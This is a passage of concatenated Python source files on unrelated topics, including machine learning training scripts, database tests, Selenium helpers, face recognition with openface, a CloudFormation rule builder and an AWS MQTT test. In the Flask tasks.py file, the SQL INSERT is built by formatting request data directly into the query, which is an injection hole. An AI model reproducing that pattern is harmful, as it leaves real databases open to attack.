act_layer(inplace=True)\n ))\n\n # 逐点卷积\n features.append(nn.Sequential(\n conv_layer(hidden_planes, out_planes, kernel_size=1, stride=1, bias=False),\n norm_layer(out_planes)\n ))\n\n self.conv = nn.Sequential(*features)\n self.use_res_connect = stride == 1 and in_planes == out_planes\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n","sub_path":"zcls/model/backbones/mobilenetv2_inverted_residual.py","file_name":"mobilenetv2_inverted_residual.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"466453153","text":"import os\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\n\nimport pyglet\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\n\nfrom common.gym_runner import GymRunner\nfrom common.q_learning_agent import QLearningAgent\n\n\nclass CartPoleAgent(QLearningAgent):\n def __init__(self):\n super(CartPoleAgent, self).__init__(2, 3, maxlen = 100000)\n\n def build_model(self):\n model = Sequential()\n model.add(Dense(30, activation='relu', input_dim=2))\n model.add(Dense(30, activation='relu'))\n model.add(Dense(3))\n model.compile(Adam(lr=0.001), 'mse')\n\n # load the weights of the model if reusing previous training session\n # model.load_weights(\"models/cartpole-v0.h5\")\n return model\n\n\nif __name__ == \"__main__\":\n gym = GymRunner('MountainCar-v0', 'gymresults/mountaincar-v0', tile_coding=True)\n agent = CartPoleAgent()\n gym.train(agent, 3000)\n agent.model.save_weights(\"models/mountaincar-v0.h5\", overwrite=True)\n gym.run(agent, 500)\n gym.env.close()\n # 
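Note on the MobileNetV2InvertedResidual block above: a quick shape check documents its contract; stride 2 halves the spatial dims, and the residual path is taken only when stride == 1 and the channel counts match. A sketch assuming the class above is in scope:

import torch

block = MobileNetV2InvertedResidual(32, 16, expansion_rate=6, stride=2)
print(block(torch.randn(1, 32, 56, 56)).shape)       # torch.Size([1, 16, 28, 28])

res_block = MobileNetV2InvertedResidual(16, 16, expansion_rate=6, stride=1)
print(res_block(torch.randn(1, 16, 28, 28)).shape)   # same shape, with skip connection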
gym.close_and_upload(os.environ['API_KEY'])\n","sub_path":"cartpole/mountain_v0.py","file_name":"mountain_v0.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"439049288","text":"# -*- coding: utf-8 -*-\n\nimport repository\nimport sqlite3\nimport unittest\n\ndb_path = 'temp_hist.db'\n\nclass RepositoryTest(unittest.TestCase):\n\n def setUp(self):\n conn = sqlite3.connect(db_path)\n c = conn.cursor()\n c.execute('DELETE FROM czujnik')\n c.execute('DELETE FROM pomiar')\n c.execute('''INSERT INTO czujnik (id, serial_number, lokalizacja) VALUES(1, 1, 'Pok 11')''')\n c.execute('''INSERT INTO pomiar (id, czujnik_id, pomiar, data) VALUES(1, 1, 20, '2015-11-10')''')\n c.execute('''INSERT INTO pomiar (id, czujnik_id, pomiar, data) VALUES(2, 1, 10, '2015-12-30')''')\n conn.commit()\n conn.close()\n\n def tearDown(self):\n conn = sqlite3.connect(db_path)\n c = conn.cursor()\n c.execute('DELETE FROM czujnik')\n c.execute('DELETE FROM pomiar')\n conn.commit()\n conn.close()\n\n def testGetByIdCzujnik(self):\n czujnik = repository.PomiarRepository().getByCzujnik(1)\n self.assertIsInstance(czujnik, repository.Czujnik, \"Objekt nie jest klasy Czujnik\")\n\n def testGetByIdCzujnikNotFound(self):\n self.assertEqual(repository.PomiarRepository().getByCzujnik(22),\n None, \"Powinno wyjść None\")\n\n def testGetBysrednia(self):\n self.assertEqual(repository.PomiarRepository().sredniaCzujnika(1),15, \"Powinno wyjść 15\")\n\n def testDeleteNotFound(self):\n self.assertRaises(repository.RepositoryException,repository.PomiarRepository().delete,22)\n\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"repositorytest.py","file_name":"repositorytest.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"580362469","text":"import argparse\n\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data\nfrom torch.utils.data import DataLoader, random_split\nfrom torch.utils.tensorboard import SummaryWriter\nfrom tqdm import tqdm\n\nfrom dataset import Remote\nfrom unet.unet_model import UNet\n\n\nclass Solver(object):\n def __init__(self, config):\n self.model = None\n self.lr = config.lr\n self.epochs = config.epoch\n self.train_batch_size = config.train_batch_size\n self.val_batch_size = config.val_batch_size\n self.criterion = None\n self.optimizer = None\n self.scheduler = None\n self.device = None\n self.cuda = config.cuda\n self.val_percent = 0.1\n self.train_loader = None\n self.val_loader = None\n\n def load_data(self):\n dataset = Remote()\n n_val = int(len(dataset) * self.val_percent)\n n_train = len(dataset) - n_val\n train, val = random_split(dataset, [n_train, n_val])\n self.train_loader = DataLoader(train, batch_size=self.train_batch_size, shuffle=True)\n self.val_loader = DataLoader(val, batch_size=self.val_batch_size, shuffle=False)\n\n def load_model(self):\n if self.cuda:\n self.device = torch.device('cuda')\n cudnn.benchmark = True\n else:\n self.device = torch.device('cpu')\n self.model = UNet(n_channels=3, n_classes=11).to(self.device)\n\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.lr, weight_decay=1e-8)\n # self.scheduler = optim.lr_scheduler.MultiStepLR(self.optimizer, milestones=[75, 150], gamma=0.5)\n self.criterion = nn.CrossEntropyLoss().to(self.device)\n\n def train(self):\n 
self.model.train()\n loss_tol = 0\n n_total = len(self.train_loader) * 512 * 512 * self.train_batch_size\n n_correct = 0\n pbar = tqdm(total=len(self.train_loader) * self.train_batch_size, unit='img')\n for i, (imgs, masks) in enumerate(self.train_loader):\n imgs = imgs.to(device=self.device, dtype=torch.float32)\n masks = masks.to(device=self.device, dtype=torch.long)\n\n output = self.model(imgs)\n loss = self.criterion(output, masks)\n loss_tol += loss.item()\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n pred = torch.max(output, 1)[1]\n correct = torch.sum(pred == masks).item()\n n_correct += correct\n\n pbar.set_postfix(**{'train_loss': loss.item() / self.train_batch_size,\n 'train_acc': correct / (self.train_batch_size * 512 * 512)})\n pbar.update(imgs.shape[0])\n pbar.close()\n return loss_tol / len(self.train_loader), n_correct / n_total\n\n def val(self):\n self.model.eval()\n loss_tol = 0\n n_correct = 0\n n_total = len(self.val_loader) * 512 * 512 * self.val_batch_size\n pbar = tqdm(total=len(self.val_loader), desc='val', unit='img')\n with torch.no_grad():\n for i, (imgs, masks) in enumerate(self.val_loader):\n imgs = imgs.to(device=self.device, dtype=torch.float32)\n masks = masks.to(device=self.device, dtype=torch.long)\n\n output = self.model(imgs)\n loss = self.criterion(output, masks)\n loss_tol += loss.item()\n\n pred = torch.max(output, 1)[1]\n n_correct += torch.sum(pred == masks).item()\n\n pbar.update(imgs.shape[0])\n pbar.close()\n return loss_tol / len(self.val_loader), n_correct / n_total\n\n def run(self):\n self.load_data()\n self.load_model()\n accuracy = 0\n writer = SummaryWriter()\n try:\n for epoch in range(self.epochs):\n train_result = self.train()\n # self.scheduler.step(epoch)\n val_result = self.val()\n writer.add_scalar('Loss/train', train_result[0], epoch)\n writer.add_scalar('Acc/train', train_result[1], epoch)\n writer.add_scalar('Loss/val', val_result[0], epoch)\n writer.add_scalar('Acc/val', val_result[1], epoch)\n accuracy = max(accuracy, val_result[1])\n print(f'epoch: {epoch + 1} / {self.epochs} train_loss: {train_result[0]} train_acc: {train_result[1]} '\n f'val_loss: {val_result[0]} val_acc: {val_result[1]}')\n writer.close()\n except KeyboardInterrupt:\n torch.save(self.model.state_dict(), 'INTERRUPTED.pth')\n writer.close()\n torch.save(self.model.state_dict(), 'model.pth')\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"cifar-10 with PyTorch\")\n parser.add_argument('--lr', default=0.1, type=float, help='learning rate')\n parser.add_argument('--epoch', default=20, type=int, help='number of epochs tp train for')\n parser.add_argument('--train_batch_size', default=2, type=int, help='training batch size')\n parser.add_argument('--val_batch_size', default=1, type=int, help='testing batch size')\n parser.add_argument('--cuda', default=torch.cuda.is_available(), type=bool, help='whether cuda is in use')\n args = parser.parse_args()\n\n solver = Solver(args)\n solver.run()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"182987137","text":"# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
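Note on the U-Net training snippet above: the accuracy denominator hard-codes `len(loader) * 512 * 512 * batch_size`, which over-counts whenever the last batch is partial or the crop size changes; deriving it from the mask tensor itself is safer. A runnable sketch:

import torch

def pixel_accuracy(logits, masks):
    pred = torch.argmax(logits, dim=1)   # (N, C, H, W) -> (N, H, W)
    return (pred == masks).sum().item() / masks.numel()

print(pixel_accuracy(torch.randn(2, 11, 4, 4),
                     torch.zeros(2, 4, 4, dtype=torch.long)))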
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport contextlib\nimport socket\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common import by\nfrom selenium.webdriver.common import proxy\nimport xvfbwrapper\n\nfrom stacklight_tests.helpers.ui import ui_settings\n\n\n@contextlib.contextmanager\ndef ui_driver(url, title, wait_element='/html'):\n vdisplay = None\n # Start a virtual display server for running the tests headless.\n if ui_settings.headless_mode:\n vdisplay = xvfbwrapper.Xvfb(width=1920, height=1080)\n args = []\n\n # workaround for memory leak in Xvfb taken from:\n # http://blog.jeffterrace.com/2012/07/xvfb-memory-leak-workaround.html\n args.append(\"-noreset\")\n\n # disables X access control\n args.append(\"-ac\")\n\n if hasattr(vdisplay, 'extra_xvfb_args'):\n # xvfbwrapper 0.2.8 or newer\n vdisplay.extra_xvfb_args.extend(args)\n else:\n vdisplay.xvfb_cmd.extend(args)\n vdisplay.start()\n driver = get_driver(url, wait_element, title)\n try:\n yield driver\n finally:\n driver.quit()\n if vdisplay is not None:\n vdisplay.stop()\n\n\ndef get_driver(url, anchor, title, by_selector_type=by.By.XPATH):\n proxy_address = ui_settings.proxy_address\n # Increase the default Python socket timeout from nothing\n # to something that will cope with slow webdriver startup times.\n # This *just* affects the communication between this test process\n # and the webdriver.\n socket.setdefaulttimeout(60)\n # Start the Selenium webdriver and setup configuration.\n proxy_ex = None\n if proxy_address is not None:\n proxy_ex = proxy.Proxy(\n {\n 'proxyType': proxy.ProxyType.MANUAL,\n 'socksProxy': proxy_address,\n }\n )\n driver = webdriver.Firefox(proxy=proxy_ex)\n if ui_settings.maximize_window:\n driver.maximize_window()\n driver.implicitly_wait(ui_settings.implicit_wait)\n driver.set_page_load_timeout(ui_settings.page_timeout)\n driver.get(url)\n driver.find_element(by_selector_type, anchor)\n assert title in driver.title\n return driver\n\n\ndef get_table(driver, xpath, frame=None):\n if frame:\n driver.switch_to.default_content()\n driver.switch_to.frame(driver.find_element_by_name(frame))\n return driver.find_element_by_xpath(xpath)\n\n\ndef get_table_row(table, row_id):\n return table.find_element_by_xpath(\"tr[{0}]\".format(row_id))\n\n\ndef get_table_size(table):\n return len(table.find_elements_by_xpath(\"tr[position() > 0]\"))\n\n\ndef get_table_cell(table, row_id, column_id):\n row = get_table_row(table, row_id)\n return row.find_element_by_xpath(\"td[{0}]\".format(column_id))\n","sub_path":"stacklight_tests/helpers/ui_tester.py","file_name":"ui_tester.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"459210969","text":"\nimport numpy as np\n\n\nfrom ml.classifiers.dt.node import Node, LeafNode\nfrom ml.classifiers.dt.cost import gini\n\n\nclass DecisionTree:\n\n def __init__(self, max_depth = 10, min_size = 5, cost = gini, f_count = None):\n self.root = None\n self.max_depth = max_depth\n self.min_size = min_size\n self.cost = cost\n self.f_count = f_count\n\n\n def __str__(self):\n return 
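Note on the ui_tester helpers above: a hypothetical usage sketch of the `ui_driver` context manager together with the table helpers; the URL, page title, and XPath here are invented for illustration:

with ui_driver("http://grafana.example.local", "Grafana") as driver:
    table = get_table(driver, "//table[@id='hosts']")
    print(get_table_size(table))
    print(get_table_cell(table, 1, 2).text)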
self.root.to_string()\n\n\n def build_tree(self, X, y, features, depth = 1):\n best_cost = 999999\n best_criteria = None\n best_split = None\n best_labels = None\n\n for feature in features:\n\n for value in np.unique(X.loc[:, feature]):\n if isinstance(value, int) or isinstance(value, float):\n left, right = X.loc[:, feature] < value, X.loc[:, feature] >= value\n else:\n left, right = X.loc[:, feature] == value, X.loc[:, feature] != value\n\n y_left, y_right = y[left], y[right]\n\n if y_left.shape[0] * y_right.shape[0] > 0:\n cost = self.cost([y_left, y_right], np.unique(y))\n\n if best_cost > cost:\n best_cost = cost\n best_criteria = (feature, value)\n best_split = (X.loc[left, :], X.loc[right, :])\n best_labels = (y_left, y_right)\n\n if not best_labels or depth > self.max_depth or len(best_labels[0]) < self.min_size or len(best_labels[1]) < self.min_size:\n return LeafNode(y)\n else:\n return Node(\n best_criteria, \n self.build_tree(best_split[0], best_labels[0], features, depth + 1), \n self.build_tree(best_split[1], best_labels[1], features, depth + 1)\n )\n\n\n def fit(self, X, y):\n if self.f_count:\n features = np.random.choice(list(X), self.f_count, replace = False)\n else:\n features = list(X)\n\n self.root = self.build_tree(X, y, features)\n\n\n def predict(self, X):\n return [self.root.predict(row) for _, row in X.iterrows()]\n \n","sub_path":"ml/classifiers/dt/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"397712552","text":"#!/usr/bin/env python\r\n# encoding: utf-8\r\n\r\nimport math\r\n\"\"\"\r\n@version: ??\r\n@author: autmanli\r\n@license: Apache Licence \r\n@file: sushu.py\r\n@time: 2018/10/12 13:29\r\n\"\"\"\r\n\r\n# 验证该数是不是素数,只需要验证该数能够整除从2到他的平方根即可\r\ndef check_sushu(num):\r\n # 求该数的平方根\r\n sqrt = math.floor(math.sqrt(num)) + 1\r\n # 循环从2到平方根的数\r\n for i in range(2, sqrt):\r\n # 如果该数能够整除,说明该数不是素数\r\n if num % i == 0:\r\n return False\r\n return True\r\n\r\n\r\n#filter用法,过滤掉数组中返回值为false的项\r\nsushu_arr=filter(check_sushu,range(1,1000000))\r\n\r\nprint(list(sushu_arr))","sub_path":"sushu.py","file_name":"sushu.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"530327664","text":"from conn import Conn\nfrom flask import jsonify, request\n\n\nclass Tasks:\n def __init__(self):\n self.c = Conn()\n \n def insert_new_task(self):\n \"\"\"This method inserts new task into the database\"\"\" \n title = request.json['title']\n description = request.json['description']\n done = request.json['done']\n self.c.cursor.execute(\n \"\"\"\n INSERT INTO tasks(title, description, done) VALUES('{}', '{}', '{}')\n \"\"\"\n .format(title, description, done))\n self.c.conn.commit()\n self.c.conn.close()\n\n\nif __name__ == \"__main__\":\n task = Tasks()\n task.insert_new_task()\n","sub_path":"package/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"446519046","text":"import openface\nimport cv2\nimport numpy as np \nimport os\nfrom sklearn import svm\n\nfileDir = os.path.dirname(os.path.realpath(__file__))\nmodelDir = os.path.join(fileDir, 'models')\ndlibModelDir = os.path.join(modelDir, 'dlib')\nopenfaceModelDir = os.path.join(modelDir, 'openface')\n\nalign = openface.AlignDlib(os.path.join(dlibModelDir, 
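Note on the Tasks snippet above: formatting request fields straight into the INSERT string invites SQL injection and breaks on values containing quotes; bound parameters fix both. A runnable sketch (sqlite3 stands in for whatever driver Conn wraps; the placeholder style depends on that driver):

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE tasks (title TEXT, description TEXT, done TEXT)")
conn.execute(
    "INSERT INTO tasks (title, description, done) VALUES (?, ?, ?)",
    ("groceries", "it's on the list", "false"),   # quote-safe
)
conn.commit()
print(conn.execute("SELECT * FROM tasks").fetchall())

Separately, check_sushu above reports 1 as prime, because its trial-division loop never runs for num=1; a small guard fixes the edge case:

import math

def check_sushu_fixed(num):
    if num < 2:
        return False
    for i in range(2, math.floor(math.sqrt(num)) + 1):
        if num % i == 0:
            return False
    return True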
\"shape_predictor_68_face_landmarks.dat\"))\nnet = openface.TorchNeuralNet(os.path.join(openfaceModelDir, 'nn4.small2.v1.t7'))\n\n\ndef alignImg(img):\n rgbimg = img.getRGB()\n if rgbimg is None:\n return None\n bb = align.getLargestFaceBoundingBox(rgbimg)\n alignedFace = align.align(96, rgbimg, bb, landmarkIndices=openface.AlignDlib.OUTER_EYES_AND_NOSE)\n return alignedFace\n\n\ndef disMed(rep, vectors, n):\n aux=0\n for i in range(3):\n distances=[]\n for j in range(n[i]):\n d = rep - vectors[j+aux]\n d = np.dot(d,d)\n distances.append(d)\n aux+=n[i]\n print(str(np.mean(distances)) + \" - \" + str(np.median(distances)) + \" - \" + str(np.std(distances)))\n \n\ndef main():\n '''\n persons = [\"miguel\", \"rudyer\"]\n persons_rep = []\n\n # Reading the persons that already know\n for person in persons:\n imgs = list(openface.data.iterImgs(\"raw/\"+ person))\n rep = []\n for i,img in enumerate(imgs,start=1):\n aligned = alignImg(img)\n if aligned is None:\n line = person + \" \" + str(i) + \" nao reconhecida\"\n print(line)\n else:\n rep.append(net.forward(aligned))\n persons_rep.append(rep)\n '''\n # Reading the unknown person\n imgs = list(openface.data.iterImgs(\"raw/desconhecido\"))\n img = imgs[0]\n print(img.name)\n img_aligned = alignImg(img)\n if img_aligned is None:\n print(\"nao reconhecido\")\n exit()\n else:\n img_rep = net.forward(img_aligned)\n\n\n imgs = list(openface.data.iterImgs(\"raw/igor\"))\n rep1 = []\n for i,img in enumerate(imgs):\n aligned = alignImg(img)\n if aligned is None:\n line = \"Igor \" + str(i) + \" nao reconhecida\"\n print(line)\n else:\n rep1.append(net.forward(aligned))\n \n imgs = list(openface.data.iterImgs(\"raw/rudyer\"))\n rep2 = []\n for i,img in enumerate(imgs):\n aligned = alignImg(img)\n if aligned is None:\n line = \"Rudyer \" + str(i) + \" nao reconhecida\"\n print(line)\n else:\n rep2.append(net.forward(aligned))\n \n imgs = list(openface.data.iterImgs(\"raw/miguel\"))\n rep3 = []\n for i,img in enumerate(imgs):\n aligned = alignImg(img)\n if aligned is None:\n line = \"Miguel \" + str(i) + \" nao reconhecida\"\n print(line)\n else:\n rep3.append(net.forward(aligned))\n\n # Fiting into the SVC classifier\n samples = rep1 + rep2 + rep3\n labels1 = [\"igor\"] * len(rep1)\n labels2 = [\"rudyer\"] * len(rep2)\n labels3 = [\"miguel\"] * len(rep3)\n labels = labels1 + labels2 + labels3\n \n clf = svm.SVC(gamma='scale', decision_function_shape='ovo', probability=True)\n clf.fit(samples, labels)\n\n # predicting the unknown face\n print(clf.predict(img_rep.reshape(1,-1)))\n\n disMed(img_rep, clf.support_vectors_, clf.n_support_)\n\n #disMed(img_rep, clf.support_vectors_, clf.n_support_[1])\n\n #disMed(img_rep, clf.support_vectors_, clf.n_support_[2])\n\n\n '''\n To do:\n classificar todas as imagens dos rostos conhecidos dentro do svm;\n ao ler um rosto desconhecido, achar as distancias do rosto pros SVM's;\n se menor ou maior que tal distancia (a definir), aplicar clf.predict().\n ''' \n \n\nmain()","sub_path":"classificador.py","file_name":"classificador.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"9009082","text":"from typing import Dict, List\n\nfrom cloudrail.knowledge.context.aws.resources.ec2.security_group_rule import SecurityGroupRule\n\nfrom cloudrail.knowledge.context.aws.cloudformation.cloudformation_constants import CloudformationResourceType\nfrom 
cloudrail.knowledge.context.aws.resources_builders.cloudformation.ec2.cloudformation_security_group_rule_base_builder import CloudformationSecurityGroupRuleBaseBuilder\n\n\nclass CloudformationSecurityGroupInlineRuleBuilder(CloudformationSecurityGroupRuleBaseBuilder):\n\n def __init__(self, cfn_by_type_map: Dict[CloudformationResourceType, Dict[str, Dict]]):\n super().__init__(CloudformationResourceType.SECURITY_GROUP, cfn_by_type_map)\n\n def parse_resource(self, cfn_res_attr: dict) -> List[SecurityGroupRule]:\n rules = []\n properties: dict = cfn_res_attr['Properties']\n\n rules.extend(self.parse_security_group_rule(security_group_rule_properties=ingress_rule_property,\n egress=False,\n security_group_id=self.get_resource_id(cfn_res_attr),\n account_id=cfn_res_attr['account_id'],\n region=cfn_res_attr['region']) for ingress_rule_property in self.get_property(properties, 'SecurityGroupIngress', []))\n\n rules.extend(self.parse_security_group_rule(security_group_rule_properties=egress_rule_property,\n egress=True,\n security_group_id=self.get_resource_id(cfn_res_attr),\n account_id=cfn_res_attr['account_id'],\n region=cfn_res_attr['region']) for egress_rule_property in self.get_property(properties, 'SecurityGroupEgress', []))\n\n return rules\n","sub_path":"cloudrail/knowledge/context/aws/resources_builders/cloudformation/ec2/cloudformation_security_group_inline_rule_builder.py","file_name":"cloudformation_security_group_inline_rule_builder.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"33287631","text":"from rdflib import Graph, plugin\nfrom rdflib.serializer import Serializer\n\n\nclass DataRetriever:\n\n def __init__(self):\n self.data = Graph()\n self.data.parse(\"./test.ttl\", format=\"turtle\")\n\n '''\n print(list(data.query(\"\"\"SELECT DISTINCT ?Concept\n WHERE {\n ?x a ?Concept .\n } LIMIT 1\n \"\"\"))[0].Concept)\n '''\n\n def get_pollutants(self):\n res = self.data.query(\"\"\"select distinct ?x \n WHERE \n {\n ?x a .\n }\n \"\"\")\n return res\n\n def get_stations(self):\n res = self.data.query(\"\"\"select distinct ?x \n WHERE \n {\n ?x a .\n }\n \"\"\")\n tmp = list()\n for row in res:\n d = str(row['x'].toPython())\n tmp.append(d)\n return tmp\n\n\n\n","sub_path":"HandsOn/Group07/application/back-end/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"128031606","text":"#!/usr/bin/env python\n\n# Before running this script:\n#\n# bunzip2 enwiki-latest-pages-articles.xml.bz2\n# mkdir all\n# cd all\n# split -a 3 -b 64m ../enwiki-20130102-pages-articles.xml chunk_\n# cd ..\n#\n# Then:\n#\n# .../create_dataset.py all 64 8gb 8192\n# .../create_dataset.py all 64 4gb 4096\n# .../create_dataset.py all 64 2gb 2048\n# .../create_dataset.py all 64 1gb 1024\n\nimport os, random, shutil, sys\n\ndef choose_chunks(all_dir, chunk_size, dest_dir, dest_size):\n all_chunks = os.listdir(all_dir)\n num_chunks = dest_size/chunk_size\n dest_chunks = random.sample(all_chunks, num_chunks)\n os.mkdir(dest_dir)\n for chunk in dest_chunks:\n shutil.copyfile(\n os.path.join(all_dir, chunk),\n os.path.join(dest_dir, chunk))\n\nif __name__ == '__main__':\n assert len(sys.argv) == 5\n choose_chunks(\n sys.argv[1],\n int(sys.argv[2]),\n sys.argv[3],\n 
int(sys.argv[4]))\n","sub_path":"hadoop/create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"382330723","text":"# Copyright 2010-2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# http://aws.amazon.com/apache2.0\n#\n# or in the \"license\" file accompanying this file. This file is distributed\n# on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either\n# express or implied. See the License for the specific language governing\n# permissions and limitations under the License.\n\nfrom __future__ import print_function\n\nimport argparse\nfrom awscrt import io, mqtt\nfrom awscrt.io import LogLevel\nimport threading\nimport uuid\n\nTIMEOUT = 5 # seconds given to each step of the test before giving up\nUNIQUE_ID = str(uuid.uuid4()) # prevent simultaneously-running tests from interfering with each other\nCLIENT_ID = 'test_pubsub_' + UNIQUE_ID\nTOPIC = 'test/pubsub/' + UNIQUE_ID\nMESSAGE = 'test message ' + UNIQUE_ID\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--endpoint', required=True, help=\"Connect to this endpoint (aka host-name)\")\nparser.add_argument('--port', type=int, help=\"Override default connection port\")\nparser.add_argument('--cert', help=\"File path to your client certificate, in PEM format\")\nparser.add_argument('--key', help=\"File path to your private key, in PEM format\")\nparser.add_argument('--root-ca', help=\"File path to root certificate authority, in PEM format\")\n\nio.init_logging(LogLevel.Trace, 'stderr')\n\ndef on_connection_interrupted(error_code):\n print(\"Connection has been interrupted with error code\", error_code)\n\ndef on_connection_resumed(return_code, session_present):\n print(\"Connection has been resumed with return code\", return_code, \"and session present:\", session_present)\n\nreceive_results = {}\nreceive_event = threading.Event()\ndef on_receive_message(topic, message):\n receive_results.update(locals())\n receive_event.set()\n\n# Run\nargs = parser.parse_args()\nevent_loop_group = io.EventLoopGroup(1)\nclient_bootstrap = io.ClientBootstrap(event_loop_group)\n\ntls_options = None\nif args.cert or args.key or args.root_ca:\n if args.cert:\n assert args.key\n tls_options = io.TlsContextOptions.create_client_with_mtls_from_path(args.cert, args.key)\n else:\n tls_options = io.TlsContextOptions()\n\n if args.root_ca:\n with open(args.root_ca, mode='rb') as ca:\n rootca = ca.read()\n tls_options.override_default_trust_store(rootca)\n\nif args.port:\n port = args.port\nelif io.is_alpn_available():\n port = 443\n if tls_options:\n tls_options.alpn_list='x-amzn-mqtt-ca'\nelse:\n port = 8883\n\ntls_context = io.ClientTlsContext(tls_options) if tls_options else None\nmqtt_client = mqtt.Client(client_bootstrap, tls_context)\n\n# Connect\nprint(\"Connecting to {}:{} with client-id:{}\".format(args.endpoint, port, CLIENT_ID))\nmqtt_connection = mqtt.Connection(\n client=mqtt_client,\n on_connection_interrupted=on_connection_interrupted,\n on_connection_resumed=on_connection_resumed)\n\nconnect_results = mqtt_connection.connect(\n client_id=CLIENT_ID,\n host_name=args.endpoint,\n port=port).result(TIMEOUT)\nassert(connect_results['session_present'] == False)\n\n# Subscribe\nprint(\"Subscribing 
to:\", TOPIC)\nqos = mqtt.QoS.AT_LEAST_ONCE\nsubscribe_future, subscribe_packet_id = mqtt_connection.subscribe(\n topic=TOPIC,\n qos=qos,\n callback=on_receive_message)\nsubscribe_results = subscribe_future.result(TIMEOUT)\nassert(subscribe_results['packet_id'] == subscribe_packet_id)\nassert(subscribe_results['topic'] == TOPIC)\nprint(subscribe_results)\nassert(subscribe_results['qos'] == qos)\n\n# Publish\nprint(\"Publishing to '{}': {}\".format(TOPIC, MESSAGE))\npublish_future, publish_packet_id = mqtt_connection.publish(\n topic=TOPIC,\n payload=MESSAGE,\n qos=mqtt.QoS.AT_LEAST_ONCE)\npublish_results = publish_future.result(TIMEOUT)\nassert(publish_results['packet_id'] == publish_packet_id)\n\n# Receive Message\nprint(\"Waiting to receive messsage\")\nassert(receive_event.wait(TIMEOUT))\nassert(receive_results['topic'] == TOPIC)\nassert(receive_results['message'].decode() == MESSAGE)\n\n# Unsubscribe\nprint(\"Unsubscribing from topic\")\nunsubscribe_future, unsubscribe_packet_id = mqtt_connection.unsubscribe(TOPIC)\nunsubscribe_results = unsubscribe_future.result(TIMEOUT)\nassert(unsubscribe_results['packet_id'] == unsubscribe_packet_id)\n\n# Disconnect\nprint(\"Disconnecting\")\nmqtt_connection.disconnect().result(TIMEOUT)\n\n# Done\nprint(\"Test Success\")\n","sub_path":"mqtt_test.py","file_name":"mqtt_test.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"455619867","text":"from PyQt5.QtWidgets import QApplication,QMainWindow,QLineEdit,QMessageBox\r\nfrom PyQt5 import uic\r\nfrom DB import DB\r\nfrom kamera import Kamera as cam2\r\nfrom kamera2 import Kamera as cam1\r\n\r\nclass App(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.win = uic.loadUi(r\"GUI\\ilk.ui\")\r\n self.ilDoldur()\r\n self.win.cmbIL.currentIndexChanged.connect(self.ilceDoldur)\r\n self.win.btKaydet.clicked.connect(self.kaydet)\r\n self.win.btKamera.clicked.connect(self.kameraAc)\r\n self.win.btKamera_2.clicked.connect(self.kameraAc2)\r\n self.cam = cam1()\r\n self.cam2 = cam2()\r\n self.win.show()\r\n \r\n\r\n def ilceDoldur(self):\r\n db = DB()\r\n self.win.cmbILCE.clear()\r\n liste = db.ilceListele(self.win.cmbIL.currentIndex())\r\n self.win.cmbILCE.addItem(\"Seçiniz\")\r\n for IlceKod,IlceAd in liste:\r\n self.win.cmbILCE.addItem(IlceAd)\r\n \r\n\r\n def kameraAc(self):\r\n self.cam.adiSoyadi = self.adi+\"_\"+self.soyadi\r\n 